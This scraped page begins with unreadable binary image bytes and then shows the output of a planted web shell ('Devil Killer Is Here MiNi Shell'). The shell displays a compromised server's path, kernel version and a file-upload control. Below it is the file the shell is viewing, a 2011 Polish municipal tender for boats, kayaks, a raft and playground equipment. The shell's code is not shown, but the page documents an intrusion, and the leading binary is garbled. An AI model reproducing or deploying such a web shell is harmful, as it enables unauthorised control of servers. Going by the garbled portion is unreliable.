JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110502/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110502/128221-N-2011.html

<p class="kh_header"><b>Dubicze Cerkiewne: Zakup sprzętu rekreacyjnego do Ośrodka Wypoczynkowego Bachmaty w ramach projektu   Remont zbiornika wodnego Ośrodka Wypoczynkowego Bachmaty na rz. Orlanka w Dubiczach Cerkiewnych współfinansowanego z Regionalnego Programu Operacyjnego  Województwa Podlaskiego na lata 2007-2013 , Oś priorytetowa III. Rozwój turystyki i kultury, Działanie3.1. Rozwój atrakcyjności turystycznej regionu z wyłączeniem infrastruktury uzdrowisk</b><br>
<b>Numer ogłoszenia: 128221 - 2011; data zamieszczenia: 02.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dubicze Cerkiewne , ul. Główna 65, 17-204 Dubicze Cerkiewne, woj. podlaskie, tel. 085 6827981, faks 085 6827980.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dubicze-cerkiewne.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup sprzętu rekreacyjnego do Ośrodka Wypoczynkowego Bachmaty w ramach projektu   Remont zbiornika wodnego Ośrodka Wypoczynkowego Bachmaty na rz. Orlanka w Dubiczach Cerkiewnych współfinansowanego z Regionalnego Programu Operacyjnego  Województwa Podlaskiego na lata 2007-2013 , Oś priorytetowa III. Rozwój turystyki i kultury, Działanie3.1. Rozwój atrakcyjności turystycznej regionu z wyłączeniem infrastruktury uzdrowisk.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) łódź ratownicza wiosłowa  - 1 szt + 2 wiosła  z możliwością mocowania silnika przyczepnego o mocy od 4 do  5 kM
długość od 3,50 do  3,80 m
szerokość od 1,20 do 1,40 m
wysokość burty  - 0,50 m 
waga około 80 kg
dopuszczalna ładowność około 350 kg
pojemność komór wypornościowych około  580 litrów
wzmocnione dulki i ich mocowanie
2) kajak 2 osobowy - 5 szt rekreacyjno - turystyczny ,  niezatapialny , wykonany z twardych nie wymagających konserwacji tworzyw ,wyposażony w komory wypornościowe,pojemniki hermetyczne na dokumenty, z dwoma  fotelikami/siedziska/, 2 uchwyty do przenoszenia, przelotka do cumowania oraz 2 wiosła drewniane, . Materiał polietylen 
długość od  4,80 m do 5,20m; 
szerokość  od 80cm  do 85 cm; 
waga  od 25 kg - do 40 kg, 
ilość osób 2, 
kolor:niebieski, zielony, żółty, czerwony 
3) kajak 1 osobowy - 5 szt  rekreacyjno - turystyczny,  niezatapialny ,  wykonany z twardych nie wymagających konserwacji tworzyw,  wyposażony w komory wypornościowe, pojemnik hermetyczny na dokumenty, z   fotelikiem-siedzisko ;2 uchwyty do przenoszenia,przelotka do cumowania oraz 1 wiosło drewniane. Materiał polietylen 
długość  od 3,50 cm do 5,20cm; 
szerokość od 80cm  do 90cm; 
waga od  25kg  do 40 kg, 
ilość osób 1, 
wiosła drewniane szt 1;
kolor; niebieski, zielony, czerwony, żółty
4) rower wodny - 3 osobowy - 3 szt.  budowa:  wykonany z nowoczesnych, lekkich,  wytrzymałych  na uderzenia materiałów, niezatapialny,  nadający się do wypożyczalni; uchwyty ułatwiające przenoszenie sprzętu, ładowność do 350 kg, możliwość podpięcia silnika, kolorystyka: niebieski, czerwony, żółty
5) rower wodny - 4 osobowy-  2 szt.  budowa -wykonany z nowoczesnych, lekkich,  wytrzymałych  na uderzenia materiałów,niezatapialny , nadający się do wypożyczalni; uchwyty ułatwiające przenoszenie sprzętu, ładowność  min 450 kg, możliwość podpięcia silnika, kolorystyka:niebieski,czerwony,żółty
6) plac zabaw wraz z montażem:
wieża skład zestawu: 1.wieża z dachem kopertowym; 2 platformy kwadratowe; 1 platforma trójkątna; 1 zjeżdżalnia długa; 2 ścianki z aplikacją; 6 zabezpieczeń z aplikacją, 1 podest kwadratowy, 3 wejściówki, 5 stopni; 1 rurka nad zjeżdżalnią, 9 okuć metalowych w grunt; pole strefy bezpieczeństwa: 37 m2; obwód strefy bezpieczeństwa 26 m;
linarium - szt 1 -stożek: sieć lin w kształcie stożka, średnica podstawy 180 cm, wysokość urządzenia 250 cm. Konstrukcja : rura stalowa o  średnicy 160 mm, zakotwiona 100cm poniżej gruntu w betonowym fundamencie, liny polipropylenowe o średnicy od 16-18 mm z rdzeniem stalowym, łączniki lin aluminiowe, odporne na zniszczenie, elementy metalowe malowane farbami proszkowymi poliestrowymi odpornymi na ciągłe działanie warunków atmosferycznych;
ścianka wspinaczkowa pojedyncza- szt 1 elementy konstrukcyjne: słupy nośne o przekroju okrągłym, z drzewa sosnowego, klejonego z  min. 5 warstw, toczonego cylindrycznie o średnicy co najmniej 12cm,  ryflowane wzdłużnie dla rozprężenia materiału.
Górne powierzchnie słupów konstrukcyjnych  zabezpieczone plastikowymi kapturami przed nasiąkaniem. Słupy tworzące konstrukcję nośną osadzone 10cm nad powierzchnią gruntu za pomocą stalowych okuć do betonowego fundamentu posadowionego min. 60cm w gruncie .
Ścianka wykonana ze sklejki wodoodpornej z filmem melaminowym. Elementy stalowe zabezpieczone farbami proszkowymi poliestrowymi odpornymi na działanie warunków
atmosferycznych. Kamienie wspinaczkowe z porowatej żywicy, zabezpieczone przed obrotem. Elementy drewniane i metalowe połączone ze sobą za pomocą  wkrętów,  łby wkrętów  wkładką plastikową z kapturkiem . Wszystkie materiały i urządzenia powinny mieć aktualne atesty, certyfikaty i dopuszczenia do stosowania zgodnie z Polskimi Normami.
pomost z belką i z 2 trapami - szt 1:  słupy o  przekroju  okrągłym, wykonane z drewna sosnowego, klejonego z  min. 5 warstw, toczone cylindrycznie, o średnicy 12cm, ryflowane wzdłużnie. Górne powierzchnie słupów konstrukcyjnych zabezpieczone przed nasiąkaniem, trwale zamocowanymi plastikowymi kapturami. Słupy tworzące konstrukcję nośną osadzone 10 cm nad powierzchnią gruntu za pomocą stalowych okuć kotwionych na betonowym fundamencie min 60 cm w gruncie. Elementy drewniane (słupy, podesty)  muszą być zabezpieczone przed szkodliwym wpływem warunków atmosferycznych przez impregnację środkami na bazie naturalnych olejów i wosków, posiadających wymagane atesty higieniczne. Łańcuchy i elementy złączne ocynkowane. Zakończenia elementów złącznych osłonięte plastikowymi korkami z zaślepkami.
huśtawka podwójna z belką metalową - 1 szt:  Słupy nośne o  przekroju okrągłym , wykonane są z drewna sosnowego, klejonego z min.  5 warstw, toczone cylindrycznie , o średnicy 12 cm,  ryflowane wzdłużnie. Słupy osadzone 10cm nad powierzchnią gruntu za pomocą stalowych okuć kotwionych na betonowym fundamencie min 60cm w gruncie. Nogi drewniane huśtawki zabezpieczone przed szkodliwym wpływem warunków atmosferycznych przez impregnację środkami na bazie naturalnych olejów i wosków, posiadających wymagane atesty higieniczne. Górna belka metalowa huśtawki, pospawana z giętych rur o średnicy min.  60 mm połączonych płaskownikami ,malowana farbami proszkowymi poliestrowymi odpornymi na ciągłe działanie warunków atmosferycznych. Siedziska gumowe z atestem. Łańcuchy zawiesi siedzisk i elementy złączne ocynkowane. Łby elementów złącznych osłonięte plastikowymi korkami.
równoważnia na sprężynach - 1 szt: Belka o długości 300 cm  wykonana z drewna sosnowego, klejonego z 6 warstw, o wymiarach 14 x 14 cm,  zabezpieczona przed szkodliwym wpływem warunków atmosferycznych przez impregnację środkami na bazie naturalnych olejów i wosków posiadających wymagane atesty higieniczne. Sprężyny wykonane z pręta fi 18 mm ze stali jakościowej, zabezpieczone farbami proszkowymi poliestrowymi odpornymi na ciągłe działanie warunków atmosferycznych.   Osadzenie sprężyn  na fundamentach ok. 60 cm w gruncie.           
piaskownica  szt 1 -  wykonana z bali sosnowych (drewno impregnowane środkiem grzybobójczym z atestem higienicznym) wysokość piaskownicy 30 cm; długość i szerokość 312 x312 cm.
ławka z bali stała szt 4 - ławka z drewna sosnowego impregnowanego  ciśnieniowo Elementy złączne ocynkowane i zabezpieczone  odpowiednią osłoną np. plastikowymi korkami z zaślepkami. Wymiary: wysokość 0,45m, siedzisko: 0,37- 0,40 m x  1,80-2,00m
Wszystkie materiały i urządzenia powinny mieć aktualne atesty, certyfikaty i dopuszczenia do stosowania zgodnie z Polskimi Normami. Posiadać certyfikaty bezpieczeństwa i atesty, a także spełniać normy unii europejskiej .
7) tratwa - konstrukcja tratwy - drewno świerkowe. Szkielet tratwy z desek  o grubości 5 cm i szerokości 35 cm. Podłogę i spód pokładu z desek o grubości 12 mm. Przestrzeń między podłogą,a spodem wypełniona  styropianem o grubości 20 cm i 15 cm i twardości (25). Powierzchnia całości pokładu 32 - 36   m2 tj. długości 8-9 m  i szerokości  4 m. Wszystkie elementy drewniane powinny być wykonane z drewna świerkowego i impregnowane ciśnieniowo. Tratwa powinna być zabezpieczona relingiem umieszczonym na metalowych słupach na obwodzie całego pokładu. Nad pokładem powinno być zbudowane zadaszenie z lekkich elementów stalowych o powierzchni 3 m x 6 m x 2,75 m do którego umocowany jest maszt (metalowy) o wysokości  4 m; konstrukcja utrzymująca dach na stałe umocowana do pokładu. Pokrycie dachu lekką tkaniną odporną na działanie wysokich temperatur, odporną na rozerwanie, wodoszczelną. Wszystkie elementy metalowe  należy zabezpieczyć przed korozją przez galwanizowanie i malowanie proszkowe. W lewym rogu tratwy - zamontować na stałe stół o wymiarze 1,80 m x 0,80 m x 0,75 m z ławkami, ławka z bali stała z oparciem - długości 1,80 m ,wysokości 0,45m; siedzisko szerokości 50 cm; oparcie wykonane z 2 krawędziaków 180 x 11,5 x 5 cm. Tratwa powinna zostać wyposażona w 2 m wiosła szt 4, dulki na wiosła , 6 m pychy szt 4. oraz trap ułatwiający wejście na brzeg.
Ładowność - 1500 kg.
8) motorówka wykonana z trwałych odpornych na uderzenia materiałów o . długości 400- 420 cm,
szerokość  160-180 cm;waga  około 200kg ,ilość osób  4 ,  moc silnika  min. 10 KM.(zbiornik paliwa,układ kierowniczy,układ paliwowy z filtrem,pagaje -szt 2)
9) narty turystyczne śladowe do jazdy rekreacyjnej  z butami, kijkami i wiązaniami - 10 kompletów -  (różnej długości do stosowane do wzrostu od 162 cm do 172 cm) rozmiary butów  Nr.37 -1 szt; Nr 38-2 szt; Nr 39- 2szt; Nr 40 -2 szt; Nr 41 - 1 szt: Nr 42- 2 szt.
10) ponton jednoosobowy - 1 szt. - wymiary: 220 cm x 115 cm, wymiary po złożeniu 80x40x30, ładowność 185 kg, waga 10-13 kg, szerokość tuby 30 cm, liczba komór: 2, materiał PCV, jedna ławka, podłoga  składana lub sztywna, akcesoria: pompka, zestaw naprawczy, pokrowiec, wiosła;
11)ponton dwuosobowy - 1 szt. - wymiary: 240 cm x 120 cm, wymiary po złożeniu 80x40x30, ładowność 197 kg, waga 18-20 kg, szerokość tuby 32 cm, liczba komór: 2, materiał: PCV, dwie ławki, podłoga składana lub sztywna , akcesoria: pompka, zestaw naprawczy, pokrowiec, wiosła.

Wymagane parametry techniczne oferowanego sprzętu  aby oferta nie podlegała odrzuceniu muszą być spełnione  w 100%..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.52.20.00-2, 34.51.52.00-2, 34.52.00.00-8, 37.41.11.00-3, 37.50.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każda składana oferta musi być zabezpieczona wadium o wartości : 2 500 zł (słownie złotych: dwa tysiące pięćset)
2 . Wadium może być wnoszone w :
.      pieniądzu 
.      poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
.       gwarancjach bankowych 
.      gwarancjach ubezpieczeniowych 
.      poręczeniach udzielanych przez przedmioty o których mowa w art. 6 ust.3 pkt 4 lit. b ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości /Dz. U. Nr 109, poz. 1158 z późn. zm./ 
3.Wadium wniesione w pieniądzu wpłaca się przelewem na rachunek bankowy nr 08 8071 0006 0018 8519 2000  0070 Bank Spółdzielczy w Hajnówce
4. Wadium wniesione w pieniądzu uważa się za wniesione, jeżeli środki wpłyną na rachunek bankowy Zamawiającego do terminu wyznaczonego na złożenie ofert a kopia dowodu wpłaty znajduje się w ofercie.
5. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca którego oferta została wybrana :
.       odmówi podpisania umowy na warunkach określonych w ofercie,
.        odmówi wniesienia zabezpieczenia należytego wykonania umowy, 
.         zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy, 
.         jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń potwierdzających spełnianie warunków udziału w postępowaniu. 
6.Oferta nie zabezpieczona akceptowalną formą wadium zostanie odrzucona bez rozpatrywania.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia, złożonego przez Wykonawcę zgodnie z treścią załącznika nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia, złożonego przez Wykonawcę zgodnie z treścią załącznika nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia, złożonego przez Wykonawcę zgodnie z treścią załącznika nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia, złożonego przez Wykonawcę zgodnie z treścią załącznika nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia, złożonego przez Wykonawcę zgodnie z treścią załącznika nr 4 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Kosztorys ofertowy - załącznik nr 3 do SIWZ</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. aktualne atesty, certyfikaty i dopuszczenia do stosowania zgodnie z Polskimi Normami i normami UE .</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)zmiana  zasad finansowania zamówienia; 
2) zmiany stawki podatku od towarów i usług (VAT) w przypadku zmiany przepisów.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dubicze-cerkiewne.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Dubicze Cerkiewne
17-204 Dubicze Cerkiewne
ul. Główna 65.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2011 godzina 10:00, miejsce: Urząd Gminy Dubicze Cerkiewne
17-204 Dubicze Cerkiewne
ul. Główna 65
pokój nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Regionalny Program Operacyjny  Województwa Podlaskiego na lata 2007-2013 , Oś priorytetowa III. Rozwój turystyki i kultury, Działanie3.1. Rozwój atrakcyjności turystycznej regionu z wyłączeniem infrastruktury uzdrowisk.</p>
